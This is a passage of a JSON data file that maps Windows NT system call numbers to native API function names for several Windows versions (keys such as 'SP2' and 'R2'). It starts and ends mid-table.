"NtCreateUserProcess", "171": "NtCreateWaitablePort", "172": "NtCreateWorkerFactory", "173": "NtDebugActiveProcess", "174": "NtDebugContinue", "175": "NtDeleteAtom", "176": "NtDeleteBootEntry", "177": "NtDeleteDriverEntry", "178": "NtDeleteFile", "179": "NtDeleteKey", "180": "NtDeleteObjectAuditAlarm", "181": "NtDeletePrivateNamespace", "182": "NtDeleteValueKey", "183": "NtDisplayString", "184": "NtEnumerateBootEntries", "185": "NtEnumerateDriverEntries", "186": "NtEnumerateSystemEnvironmentValuesEx", "187": "NtEnumerateTransactionObject", "188": "NtExtendSection", "189": "NtFilterToken", "190": "NtFlushInstallUILanguage", "191": "NtFlushInstructionCache", "192": "NtFlushKey", "193": "NtFlushProcessWriteBuffers", "194": "NtFlushVirtualMemory", "195": "NtFlushWriteBuffer", "196": "NtFreeUserPhysicalPages", "197": "NtFreezeRegistry", "198": "NtFreezeTransactions", "199": "NtGetContextThread", "200": "NtGetCurrentProcessorNumber", "201": "NtGetDevicePowerState", "202": "NtGetMUIRegistryInfo", "203": "NtGetNextProcess", "204": "NtGetNextThread", "205": "NtGetNlsSectionPtr", "206": "NtGetNotificationResourceManager", "207": "NtGetPlugPlayEvent", "208": "NtGetWriteWatch", "209": "NtImpersonateAnonymousToken", "210": "NtImpersonateThread", "211": "NtInitializeNlsFiles", "212": "NtInitializeRegistry", "213": "NtInitiatePowerAction", "214": "NtIsSystemResumeAutomatic", "215": "NtIsUILanguageComitted", "216": "NtListenPort", "217": "NtLoadDriver", "218": "NtLoadKey", "219": "NtLoadKey2", "220": "NtLoadKeyEx", "221": "NtLockFile", "222": "NtLockProductActivationKeys", "223": "NtLockRegistryKey", "224": "NtLockVirtualMemory", "225": "NtMakePermanentObject", "226": "NtMakeTemporaryObject", "227": "NtMapCMFModule", "228": "NtMapUserPhysicalPages", "229": "NtModifyBootEntry", "230": "NtModifyDriverEntry", "231": "NtNotifyChangeDirectoryFile", "232": "NtNotifyChangeKey", "233": "NtNotifyChangeMultipleKeys", "234": "NtOpenEnlistment", "235": "NtOpenEventPair", "236": "NtOpenIoCompletion", "237": "NtOpenJobObject", "238": "NtOpenKeyTransacted", "239": "NtOpenKeyedEvent", "240": "NtOpenMutant", "241": "NtOpenObjectAuditAlarm", "242": "NtOpenPrivateNamespace", "243": "NtOpenProcessToken", "244": "NtOpenResourceManager", "245": "NtOpenSemaphore", "246": "NtOpenSession", "247": "NtOpenSymbolicLinkObject", "248": "NtOpenThread", "249": "NtOpenTimer", "250": "NtOpenTransaction", "251": "NtOpenTransactionManager", "252": "NtPlugPlayControl", "253": "NtPrePrepareComplete", "254": "NtPrePrepareEnlistment", "255": "NtPrepareComplete", "256": "NtPrepareEnlistment", "257": "NtPrivilegeCheck", "258": "NtPrivilegeObjectAuditAlarm", "259": "NtPrivilegedServiceAuditAlarm", "260": "NtPropagationComplete", "261": "NtPropagationFailed", "262": "NtPulseEvent", "263": "NtQueryBootEntryOrder", "264": "NtQueryBootOptions", "265": "NtQueryDebugFilterState", "266": "NtQueryDirectoryObject", "267": "NtQueryDriverEntryOrder", "268": "NtQueryEaFile", "269": "NtQueryFullAttributesFile", "270": "NtQueryInformationAtom", "271": "NtQueryInformationEnlistment", "272": "NtQueryInformationJobObject", "273": "NtQueryInformationPort", "274": "NtQueryInformationResourceManager", "275": "NtQueryInformationTransaction", "276": "NtQueryInformationTransactionManager", "277": "NtQueryInformationWorkerFactory", "278": "NtQueryInstallUILanguage", "279": "NtQueryIntervalProfile", "280": "NtQueryIoCompletion", "281": "NtQueryLicenseValue", "282": "NtQueryMultipleValueKey", "283": "NtQueryMutant", "284": "NtQueryOpenSubKeys", "285": "NtQueryOpenSubKeysEx", "286": "NtQueryPortInformationProcess", "287": "NtQueryQuotaInformationFile", "288": "NtQuerySecurityObject", "289": "NtQuerySemaphore", "290": "NtQuerySymbolicLinkObject", "291": "NtQuerySystemEnvironmentValue", "292": "NtQuerySystemEnvironmentValueEx", "293": "NtQueryTimerResolution", "294": "NtRaiseException", "295": "NtRaiseHardError", "296": "NtReadOnlyEnlistment", "297": "NtRecoverEnlistment", "298": "NtRecoverResourceManager", "299": "NtRecoverTransactionManager", "300": "NtRegisterProtocolAddressInformation", "301": "NtRegisterThreadTerminatePort", "302": "NtReleaseCMFViewOwnership", "303": "NtReleaseKeyedEvent", "304": "NtReleaseWorkerFactoryWorker", "305": "NtRemoveIoCompletionEx", "306": "NtRemoveProcessDebug", "307": "NtRenameKey", "308": "NtRenameTransactionManager", "309": "NtReplaceKey", "310": "NtReplacePartitionUnit", "311": "NtReplyWaitReplyPort", "312": "NtCancelDeviceWakeupRequest", "313": "NtRequestPort", "314": "NtRequestWakeupLatency", "315": "NtResetEvent", "316": "NtResetWriteWatch", "317": "NtRestoreKey", "318": "NtResumeProcess", "319": "NtRollbackComplete", "320": "NtRollbackEnlistment", "321": "NtRollbackTransaction", "322": "NtRollforwardTransactionManager", "323": "NtSaveKey", "324": "NtSaveKeyEx", "325": "NtSaveMergedKeys", "326": "NtSecureConnectPort", "327": "NtSetBootEntryOrder", "328": "NtSetBootOptions", "329": "NtSetContextThread", "330": "NtSetDebugFilterState", "331": "NtSetDefaultHardErrorPort", "332": "NtSetDefaultLocale", "333": "NtSetDefaultUILanguage", "334": "NtSetDriverEntryOrder", "335": "NtSetEaFile", "336": "NtSetHighEventPair", "337": "NtSetHighWaitLowEventPair", "338": "NtSetInformationDebugObject", "339": "NtSetInformationEnlistment", "340": "NtSetInformationJobObject", "341": "NtSetInformationKey", "342": "NtSetInformationResourceManager", "343": "NtSetInformationToken", "344": "NtSetInformationTransaction", "345": "NtSetInformationTransactionManager", "346": "NtSetInformationWorkerFactory", "347": "NtSetIntervalProfile", "348": "NtSetIoCompletion", "349": "NtSetLdtEntries", "350": "NtSetLowEventPair", "351": "NtSetLowWaitHighEventPair", "352": "NtSetQuotaInformationFile", "353": "NtSetSecurityObject", "354": "NtSetSystemEnvironmentValue", "355": "NtSetSystemEnvironmentValueEx", "356": "NtSetSystemInformation", "357": "NtSetSystemPowerState", "358": "NtSetSystemTime", "359": "NtSetThreadExecutionState", "360": "NtSetTimerResolution", "361": "NtSetUuidSeed", "362": "NtSetVolumeInformationFile", "363": "NtShutdownSystem", "364": "NtShutdownWorkerFactory", "365": "NtSignalAndWaitForSingleObject", "366": "NtSinglePhaseReject", "367": "NtStartProfile", "368": "NtStopProfile", "369": "NtSuspendProcess", "370": "NtSuspendThread", "371": "NtSystemDebugControl", "372": "NtTerminateJobObject", "373": "NtTestAlert", "374": "NtThawRegistry", "375": "NtThawTransactions", "376": "NtTraceControl", "377": "NtTranslateFilePath", "378": "NtUnloadDriver", "379": "NtUnloadKey", "380": "NtUnloadKey2", "381": "NtUnloadKeyEx", "382": "NtUnlockFile", "383": "NtUnlockVirtualMemory", "384": "NtVdmControl", "385": "NtWaitForDebugEvent", "386": "NtWaitForKeyedEvent", "387": "NtWaitForWorkViaWorkerFactory", "388": "NtWaitHighEventPair", "389": "NtWaitLowEventPair", "390": "NtWorkerFactoryWorkerReady"}, "SP2": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": "NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", "16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": "NtQueryAttributesFile", "59": "NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAcquireCMFViewOwnership", "103": "NtAddBootEntry", "104": "NtAddDriverEntry", "105": "NtAdjustGroupsToken", "106": "NtAlertResumeThread", "107": "NtAlertThread", "108": "NtAllocateLocallyUniqueId", "109": "NtAllocateUserPhysicalPages", "110": "NtAllocateUuids", "111": "NtAlpcAcceptConnectPort", "112": "NtAlpcCancelMessage", "113": "NtAlpcConnectPort", "114": "NtAlpcCreatePort", "115": "NtAlpcCreatePortSection", "116": "NtAlpcCreateResourceReserve", "117": "NtAlpcCreateSectionView", "118": "NtAlpcCreateSecurityContext", "119": "NtAlpcDeletePortSection", "120": "NtAlpcDeleteResourceReserve", "121": "NtAlpcDeleteSectionView", "122": "NtAlpcDeleteSecurityContext", "123": "NtAlpcDisconnectPort", "124": "NtAlpcImpersonateClientOfPort", "125": "NtAlpcOpenSenderProcess", "126": "NtAlpcOpenSenderThread", "127": "NtAlpcQueryInformation", "128": "NtAlpcQueryInformationMessage", "129": "NtAlpcRevokeSecurityContext", "130": "NtAlpcSendWaitReceivePort", "131": "NtAlpcSetInformation", "132": "NtAreMappedFilesTheSame", "133": "NtAssignProcessToJobObject", "134": "NtCancelDeviceWakeupRequest", "135": "NtCancelIoFileEx", "136": "NtCancelSynchronousIoFile", "137": "NtCommitComplete", "138": "NtCommitEnlistment", "139": "NtCommitTransaction", "140": "NtCompactKeys", "141": "NtCompareTokens", "142": "NtCompleteConnectPort", "143": "NtCompressKey", "144": "NtConnectPort", "145": "NtCreateDebugObject", "146": "NtCreateDirectoryObject", "147": "NtCreateEnlistment", "148": "NtCreateEventPair", "149": "NtCreateIoCompletion", "150": "NtCreateJobObject", "151": "NtCreateJobSet", "152": "NtCreateKeyTransacted", "153": "NtCreateKeyedEvent", "154": "NtCreateMailslotFile", "155": "NtCreateMutant", "156": "NtCreateNamedPipeFile", "157": "NtCreatePagingFile", "158": "NtCreatePort", "159": "NtCreatePrivateNamespace", "160": "NtCreateProcess", "161": "NtCreateProfile", "162": "NtCreateResourceManager", "163": "NtCreateSemaphore", "164": "NtCreateSymbolicLinkObject", "165": "NtCreateThreadEx", "166": "NtCreateTimer", "167": "NtCreateToken", "168": "NtCreateTransaction", "169": "NtCreateTransactionManager", "170": "NtCreateUserProcess", "171": "NtCreateWaitablePort", "172": "NtCreateWorkerFactory", "173": "NtDebugActiveProcess", "174": "NtDebugContinue", "175": "NtDeleteAtom", "176": "NtDeleteBootEntry", "177": "NtDeleteDriverEntry", "178": "NtDeleteFile", "179": "NtDeleteKey", "180": "NtDeleteObjectAuditAlarm", "181": "NtDeletePrivateNamespace", "182": "NtDeleteValueKey", "183": "NtDisplayString", "184": "NtEnumerateBootEntries", "185": "NtEnumerateDriverEntries", "186": "NtEnumerateSystemEnvironmentValuesEx", "187": "NtEnumerateTransactionObject", "188": "NtExtendSection", "189": "NtFilterToken", "190": "NtFlushInstallUILanguage", "191": "NtFlushInstructionCache", "192": "NtFlushKey", "193": "NtFlushProcessWriteBuffers", "194": "NtFlushVirtualMemory", "195": "NtFlushWriteBuffer", "196": "NtFreeUserPhysicalPages", "197": "NtFreezeRegistry", "198": "NtFreezeTransactions", "199": "NtGetContextThread", "200": "NtGetCurrentProcessorNumber", "201": "NtGetDevicePowerState", "202": "NtGetMUIRegistryInfo", "203": "NtGetNextProcess", "204": "NtGetNextThread", "205": "NtGetNlsSectionPtr", "206": "NtGetNotificationResourceManager", "207": "NtGetPlugPlayEvent", "208": "NtGetWriteWatch", "209": "NtImpersonateAnonymousToken", "210": "NtImpersonateThread", "211": "NtInitializeNlsFiles", "212": "NtInitializeRegistry", "213": "NtInitiatePowerAction", "214": "NtIsSystemResumeAutomatic", "215": "NtIsUILanguageComitted", "216": "NtListenPort", "217": "NtLoadDriver", "218": "NtLoadKey", "219": "NtLoadKey2", "220": "NtLoadKeyEx", "221": "NtLockFile", "222": "NtLockProductActivationKeys", "223": "NtLockRegistryKey", "224": "NtLockVirtualMemory", "225": "NtMakePermanentObject", "226": "NtMakeTemporaryObject", "227": "NtMapCMFModule", "228": "NtMapUserPhysicalPages", "229": "NtModifyBootEntry", "230": "NtModifyDriverEntry", "231": "NtNotifyChangeDirectoryFile", "232": "NtNotifyChangeKey", "233": "NtNotifyChangeMultipleKeys", "234": "NtOpenEnlistment", "235": "NtOpenEventPair", "236": "NtOpenIoCompletion", "237": "NtOpenJobObject", "238": "NtOpenKeyTransacted", "239": "NtOpenKeyedEvent", "240": "NtOpenMutant", "241": "NtOpenObjectAuditAlarm", "242": "NtOpenPrivateNamespace", "243": "NtOpenProcessToken", "244": "NtOpenResourceManager", "245": "NtOpenSemaphore", "246": "NtOpenSession", "247": "NtOpenSymbolicLinkObject", "248": "NtOpenThread", "249": "NtOpenTimer", "250": "NtOpenTransaction", "251": "NtOpenTransactionManager", "252": "NtPlugPlayControl", "253": "NtPrePrepareComplete", "254": "NtPrePrepareEnlistment", "255": "NtPrepareComplete", "256": "NtPrepareEnlistment", "257": "NtPrivilegeCheck", "258": "NtPrivilegeObjectAuditAlarm", "259": "NtPrivilegedServiceAuditAlarm", "260": "NtPropagationComplete", "261": "NtPropagationFailed", "262": "NtPulseEvent", "263": "NtQueryBootEntryOrder", "264": "NtQueryBootOptions", "265": "NtQueryDebugFilterState", "266": "NtQueryDirectoryObject", "267": "NtQueryDriverEntryOrder", "268": "NtQueryEaFile", "269": "NtQueryFullAttributesFile", "270": "NtQueryInformationAtom", "271": "NtQueryInformationEnlistment", "272": "NtQueryInformationJobObject", "273": "NtQueryInformationPort", "274": "NtQueryInformationResourceManager", "275": "NtQueryInformationTransaction", "276": "NtQueryInformationTransactionManager", "277": "NtQueryInformationWorkerFactory", "278": "NtQueryInstallUILanguage", "279": "NtQueryIntervalProfile", "280": "NtQueryIoCompletion", "281": "NtQueryLicenseValue", "282": "NtQueryMultipleValueKey", "283": "NtQueryMutant", "284": "NtQueryOpenSubKeys", "285": "NtQueryOpenSubKeysEx", "286": "NtQueryPortInformationProcess", "287": "NtQueryQuotaInformationFile", "288": "NtQuerySecurityObject", "289": "NtQuerySemaphore", "290": "NtQuerySymbolicLinkObject", "291": "NtQuerySystemEnvironmentValue", "292": "NtQuerySystemEnvironmentValueEx", "293": "NtQueryTimerResolution", "294": "NtRaiseException", "295": "NtRaiseHardError", "296": "NtReadOnlyEnlistment", "297": "NtRecoverEnlistment", "298": "NtRecoverResourceManager", "299": "NtRecoverTransactionManager", "300": "NtRegisterProtocolAddressInformation", "301": "NtRegisterThreadTerminatePort", "302": "NtReleaseCMFViewOwnership", "303": "NtReleaseKeyedEvent", "304": "NtReleaseWorkerFactoryWorker", "305": "NtRemoveIoCompletionEx", "306": "NtRemoveProcessDebug", "307": "NtRenameKey", "308": "NtRenameTransactionManager", "309": "NtReplaceKey", "310": "NtReplacePartitionUnit", "311": "NtReplyWaitReplyPort", "312": "NtRequestDeviceWakeup", "313": "NtRequestPort", "314": "NtRequestWakeupLatency", "315": "NtResetEvent", "316": "NtResetWriteWatch", "317": "NtRestoreKey", "318": "NtResumeProcess", "319": "NtRollbackComplete", "320": "NtRollbackEnlistment", "321": "NtRollbackTransaction", "322": "NtRollforwardTransactionManager", "323": "NtSaveKey", "324": "NtSaveKeyEx", "325": "NtSaveMergedKeys", "326": "NtSecureConnectPort", "327": "NtSetBootEntryOrder", "328": "NtSetBootOptions", "329": "NtSetContextThread", "330": "NtSetDebugFilterState", "331": "NtSetDefaultHardErrorPort", "332": "NtSetDefaultLocale", "333": "NtSetDefaultUILanguage", "334": "NtSetDriverEntryOrder", "335": "NtSetEaFile", "336": "NtSetHighEventPair", "337": "NtSetHighWaitLowEventPair", "338": "NtSetInformationDebugObject", "339": "NtSetInformationEnlistment", "340": "NtSetInformationJobObject", "341": "NtSetInformationKey", "342": "NtSetInformationResourceManager", "343": "NtSetInformationToken", "344": "NtSetInformationTransaction", "345": "NtSetInformationTransactionManager", "346": "NtSetInformationWorkerFactory", "347": "NtSetIntervalProfile", "348": "NtSetIoCompletion", "349": "NtSetLdtEntries", "350": "NtSetLowEventPair", "351": "NtSetLowWaitHighEventPair", "352": "NtSetQuotaInformationFile", "353": "NtSetSecurityObject", "354": "NtSetSystemEnvironmentValue", "355": "NtSetSystemEnvironmentValueEx", "356": "NtSetSystemInformation", "357": "NtSetSystemPowerState", "358": "NtSetSystemTime", "359": "NtSetThreadExecutionState", "360": "NtSetTimerResolution", "361": "NtSetUuidSeed", "362": "NtSetVolumeInformationFile", "363": "NtShutdownSystem", "364": "NtShutdownWorkerFactory", "365": "NtSignalAndWaitForSingleObject", "366": "NtSinglePhaseReject", "367": "NtStartProfile", "368": "NtStopProfile", "369": "NtSuspendProcess", "370": "NtSuspendThread", "371": "NtSystemDebugControl", "372": "NtTerminateJobObject", "373": "NtTestAlert", "374": "NtThawRegistry", "375": "NtThawTransactions", "376": "NtTraceControl", "377": "NtTranslateFilePath", "378": "NtUnloadDriver", "379": "NtUnloadKey", "380": "NtUnloadKey2", "381": "NtUnloadKeyEx", "382": "NtUnlockFile", "383": "NtUnlockVirtualMemory", "384": "NtVdmControl", "385": "NtWaitForDebugEvent", "386": "NtWaitForKeyedEvent", "387": "NtWaitForWorkViaWorkerFactory", "388": "NtWaitHighEventPair", "389": "NtWaitLowEventPair", "390": "NtWorkerFactoryWorkerReady"}, "R2": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": "NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", "16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": "NtQueryAttributesFile", "59": "NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAddBootEntry", "103": "NtAddDriverEntry", "104": "NtAdjustGroupsToken", "105": "NtAlertResumeThread", "106": "NtAlertThread", "107": "NtAllocateLocallyUniqueId", "108": "NtAllocateReserveObject", "109": "NtAllocateUserPhysicalPages", "110": "NtAllocateUuids", "111": "NtAlpcAcceptConnectPort", "112": "NtAlpcCancelMessage", "113": "NtAlpcConnectPort", "114": "NtAlpcCreatePort", "115": "NtAlpcCreatePortSection", "116": "NtAlpcCreateResourceReserve", "117": "NtAlpcCreateSectionView", "118": "NtAlpcCreateSecurityContext", "119": "NtAlpcDeletePortSection", "120": "NtAlpcDeleteResourceReserve", "121": "NtAlpcDeleteSectionView", "122": "NtAlpcDeleteSecurityContext", "123": "NtAlpcDisconnectPort", "124": "NtAlpcImpersonateClientOfPort", "125": "NtAlpcOpenSenderProcess", "126": "NtAlpcOpenSenderThread", "127": "NtAlpcQueryInformation", "128": "NtAlpcQueryInformationMessage", "129": "NtAlpcRevokeSecurityContext", "130": "NtAlpcSendWaitReceivePort", "131": "NtAlpcSetInformation", "132": "NtAreMappedFilesTheSame", "133": "NtAssignProcessToJobObject", "134": "NtCancelIoFileEx", "135": "NtCancelSynchronousIoFile", "136": "NtCommitComplete", "137": "NtCommitEnlistment", "138": "NtCommitTransaction", "139": "NtCompactKeys", "140": "NtCompareTokens", "141": "NtCompleteConnectPort", "142": "NtCompressKey", "143": "NtConnectPort", "144": "NtCreateDebugObject", "145": "NtCreateDirectoryObject", "146": "NtCreateEnlistment", "147": "NtCreateEventPair", "148": "NtCreateIoCompletion", "149": "NtCreateJobObject", "150": "NtCreateJobSet", "151": "NtCreateKeyTransacted", "152": "NtCreateKeyedEvent", "153": "NtCreateMailslotFile", "154": "NtCreateMutant", "155": "NtCreateNamedPipeFile", "156": "NtCreatePagingFile", "157": "NtCreatePort", "158": "NtCreatePrivateNamespace", "159": "NtCreateProcess", "160": "NtCreateProfile", "161": "NtCreateProfileEx", "162": "NtCreateResourceManager", "163": "NtCreateSemaphore", "164": "NtCreateSymbolicLinkObject", "165": "NtCreateThreadEx", "166": "NtCreateTimer", "167": "NtCreateToken", "168": "NtCreateTransaction", "169": "NtCreateTransactionManager", "170": "NtCreateUserProcess", "171": "NtCreateWaitablePort", "172": "NtCreateWorkerFactory", "173": "NtDebugActiveProcess", "174": "NtDebugContinue", "175": "NtDeleteAtom", "176": "NtDeleteBootEntry", "177": "NtDeleteDriverEntry", "178": "NtDeleteFile", "179": "NtDeleteKey", "180": "NtDeleteObjectAuditAlarm", "181": "NtDeletePrivateNamespace", "182": "NtDeleteValueKey", "183": "NtDisableLastKnownGood", "184": "NtDisplayString", "185": "NtDrawText", "186": "NtEnableLastKnownGood", "187": "NtEnumerateBootEntries", "188": "NtEnumerateDriverEntries", "189": "NtEnumerateSystemEnvironmentValuesEx", "190": "NtEnumerateTransactionObject", "191": "NtExtendSection", "192": "NtFilterToken", "193": "NtFlushInstallUILanguage", "194": "NtFlushInstructionCache", "195": "NtFlushKey", "196": "NtFlushProcessWriteBuffers", "197": "NtFlushVirtualMemory", "198": "NtFlushWriteBuffer", "199": "NtFreeUserPhysicalPages", "200": "NtFreezeRegistry", "201": "NtFreezeTransactions", "202": "NtGetContextThread", "203": "NtGetCurrentProcessorNumber", "204": "NtGetDevicePowerState", "205": "NtGetMUIRegistryInfo", "206": "NtGetNextProcess", "207": "NtGetNextThread", "208": "NtGetNlsSectionPtr", "209": "NtGetNotificationResourceManager", "210": "NtGetPlugPlayEvent", "211": "NtGetWriteWatch", "212": "NtImpersonateAnonymousToken", "213": "NtImpersonateThread", "214": "NtInitializeNlsFiles", "215": "NtInitializeRegistry", "216": "NtInitiatePowerAction", "217": "NtIsSystemResumeAutomatic", "218": "NtIsUILanguageComitted", "219": "NtListenPort", "220": "NtLoadDriver", "221": "NtLoadKey", "222": "NtLoadKey2", "223": "NtLoadKeyEx", "224": "NtLockFile", "225": "NtLockProductActivationKeys", "226": "NtLockRegistryKey", "227": "NtLockVirtualMemory", "228": "NtMakePermanentObject", "229": "NtMakeTemporaryObject", "230": "NtMapCMFModule", "231": "NtMapUserPhysicalPages", "232": "NtModifyBootEntry", "233": "NtModifyDriverEntry", "234": "NtNotifyChangeDirectoryFile", "235": "NtNotifyChangeKey", "236": "NtNotifyChangeMultipleKeys", "237": "NtNotifyChangeSession", "238": "NtOpenEnlistment", "239": "NtOpenEventPair", "240": "NtOpenIoCompletion", "241": "NtOpenJobObject", "242": "NtOpenKeyEx", "243": "NtOpenKeyTransacted", "244": "NtOpenKeyTransactedEx", "245": "NtOpenKeyedEvent", "246": "NtOpenMutant", "247": "NtOpenObjectAuditAlarm", "248": "NtOpenPrivateNamespace", "249": "NtOpenProcessToken", "250": "NtOpenResourceManager", "251": "NtOpenSemaphore", "252": "NtOpenSession", "253": "NtOpenSymbolicLinkObject", "254": "NtOpenThread", "255": "NtOpenTimer", "256": "NtOpenTransaction", "257": "NtOpenTransactionManager", "258": "NtPlugPlayControl", "259": "NtPrePrepareComplete", "260": "NtPrePrepareEnlistment", "261": "NtPrepareComplete", "262": "NtPrepareEnlistment", "263": "NtPrivilegeCheck", "264": "NtPrivilegeObjectAuditAlarm", "265": "NtPrivilegedServiceAuditAlarm", "266": "NtPropagationComplete", "267": "NtPropagationFailed", "268": "NtPulseEvent", "269": "NtQueryBootEntryOrder", "270": "NtQueryBootOptions", "271": "NtQueryDebugFilterState", "272": "NtQueryDirectoryObject", "273": "NtQueryDriverEntryOrder", "274": "NtQueryEaFile", "275": "NtQueryFullAttributesFile", "276": "NtQueryInformationAtom", "277": "NtQueryInformationEnlistment", "278": "NtQueryInformationJobObject", "279": "NtQueryInformationPort", "280": "NtQueryInformationResourceManager", "281": "NtQueryInformationTransaction", "282": "NtQueryInformationTransactionManager", "283": "NtQueryInformationWorkerFactory", "284": "NtQueryInstallUILanguage", "285": "NtQueryIntervalProfile", "286": "NtQueryIoCompletion", "287": "NtQueryLicenseValue", "288": "NtQueryMultipleValueKey", "289": "NtQueryMutant", "290": "NtQueryOpenSubKeys", "291": "NtQueryOpenSubKeysEx", "292": "NtQueryPortInformationProcess", "293": "NtQueryQuotaInformationFile", "294": "NtQuerySecurityAttributesToken", "295": "NtQuerySecurityObject", "296": "NtQuerySemaphore", "297": "NtQuerySymbolicLinkObject", "298": "NtQuerySystemEnvironmentValue", "299": "NtQuerySystemEnvironmentValueEx", "300": "NtQuerySystemInformationEx", "301": "NtQueryTimerResolution", "302": "NtQueueApcThreadEx", "303": "NtRaiseException", "304": "NtRaiseHardError", "305": "NtReadOnlyEnlistment", "306": "NtRecoverEnlistment", "307": "NtRecoverResourceManager", "308": "NtRecoverTransactionManager", "309": "NtRegisterProtocolAddressInformation", "310": "NtRegisterThreadTerminatePort", "311": "NtReleaseKeyedEvent", "312": "NtReleaseWorkerFactoryWorker", "313": "NtRemoveIoCompletionEx", "314": "NtRemoveProcessDebug", "315": "NtRenameKey", "316": "NtRenameTransactionManager", "317": "NtReplaceKey", "318": "NtReplacePartitionUnit", "319": "NtReplyWaitReplyPort", "320": "NtRequestPort", "321": 